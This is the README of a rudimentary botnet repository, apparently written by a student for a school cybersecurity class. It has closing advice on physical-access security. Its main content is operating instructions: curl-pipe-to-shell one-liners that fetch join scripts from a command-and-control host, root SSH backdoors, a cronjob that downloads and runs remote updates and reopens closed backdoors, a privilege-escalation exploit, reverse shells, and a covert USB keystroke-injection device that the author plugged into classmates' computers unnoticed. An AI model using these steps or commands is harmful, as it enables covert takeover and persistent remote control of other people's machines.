Code for building and administrating a rudimentary botnet.
Please note that I strictly used this code for educational purposes. I do not and never have run a DDoSsing botnet or other such illegal operation and do not condone the use of this code for any malicious purpose.
I used this code at the Virginia Residential Governor's School for Math, Science, and Technology to take over 36 Raspberry Pi microcomputers and Kali Linux desktops in the cybersecurity class in which I partook. This activity was part of the class, and I absolutely never violated any rules.
The full name of the Governor's School's Cybersecurity class was "Come Out, Come Out, Wherever You Are." Yes. I know. I nevertheless named this repository after an abbreviation of that name, plus "net," as in botnet.
Also, it sounds like "coconut." What's not to like?
Through developing this codebase, I learned a lot about networking, shell scripting, and security. I realized just how dangerous it can be to allow others physical access to one's computer, and as such I've been far more careful henceforth to follow common-sense security precautions.
Though I'd never use an attack like this against anyone without permission (outside the aforementioned scenario), there are people who certainly would. As such, owners of (especially portable) computers ought to build, at the bare minimum, the following healthy security habits:
- Obviously, password-protect your device, and require authentication to log in after sleep.
- Remove any delay between closure of your device and the your screen lock becoming active. This may annoy you if you accidentally close the computer, but it will protect you from mistakenly thinking your computer is secure enough to be left alone when it won't be for five minutes.
- Never, ever leave your computer unlocked and/or unattended. By the end of my Governor's School class, I was able to seize total remote control of a Mac or Linux device, as root, with only 12 seconds of typing. Imagine what someone with genuine malevolent intentions (and more experience than a High School sophomore) could do if you let them touch your computer.
- If you must leave your computer unattended, close it to prevent anyone else taking over control when you walk away.
These changes definitely won't solve every security problem, but they'll make it much harder for someone to exploit your having given them physical access to your device.
In brief, physical access can be used by an attacker to enter a simple command to download and run a shell script which will set up that computer as a new node in the network. This process involves enabling SSH and giving public key access to the root account, and adding a root cronjob to periodically download and run an update script from the Command & Control server (detailed below).
That update script will automatically reopen any backdoors which may have been closed since the last run. Code can be added to perform any task desired.
Thus, an operator may control nodes via SSH or by adding code for all nodes to run into update scripts. Reverse shells can also be used for finer control sans direct access network access for SSH.
C&C is managed on ports 2042 & 2043 of a server.
Instructional scripts are served via HTTP on port 2042. Run
python3 -m http.server 2042from the control directory to make them available to nodes upon request.
A simple Python script opens a socket on port 2043 which listens for incoming data from nodes. All requests to the server are printed to the terminal, and important ones may be written into a file nodes.txt. Run
python3 server.pyafter installing the dependencies listed in requirements.txt to listen for incoming data.
This process can be streamlined by using ./launch.sh to automatically open two tmux windows with the appropriate commands.
On macOS, two scripts are used to join a computer to the network, join.sh and enact.sh. join.sh allows one-command joining: it will download and decrypt an exploit needed to elevate (on OS X El Capitan) to a root shell and then run enact.sh in that root shell automatically. That script will handle joining the botnet. If you already have root access, you can just run enact.sh directly.
For GNU/Linux, there's just one script, join.sh, which must be executed as root or as a user with root privileges.
Here are simple one-liners to join the botnet:
Mac:
curl [host]:2042/mac/join.sh |shLinux:
curl [host]:2042/linux/join.sh |shTo save time and keystrokes, you can use these shortcuts:
curl [host]:2042/jm |sh
curl [host]:2042/jl |shOr, to save even more time, you can skip the part where you think about what operating system the computer is using and simply type:
curl [host]:2042/join.sh |shReally in a hurry? There's a shortcut for this as well:
curl [host]:2042/j |shIn the duck directory, you'll find Arduino code for delivering the join scripts automatically to macOS and Linux computers.
I used this code with a Digispark ATTINY85, though it can be easily modified to work with other Rubber Duck USBs based on Arduino.
During the cybersecurity class in which I developed coconet, I plugged the drive into users' computers while they weren't looking, saving me the inconvenience of having to attain keyboard access.
To upload this code to your drive, follow this tutorial.
Running tools/run.sh followed by a string giving the command you'd like to run will cause all nodes in nodes.txt (in your working directory) to run that command through SSH. This is less useful now that cron control exists. You can also run up.sh to view which/how many nodes on the current network are online.
This software was created by Erik Boesen and is available under the MIT License.
I'm not affiliated with Lynchburg College in any way, nor does the college endorse this software.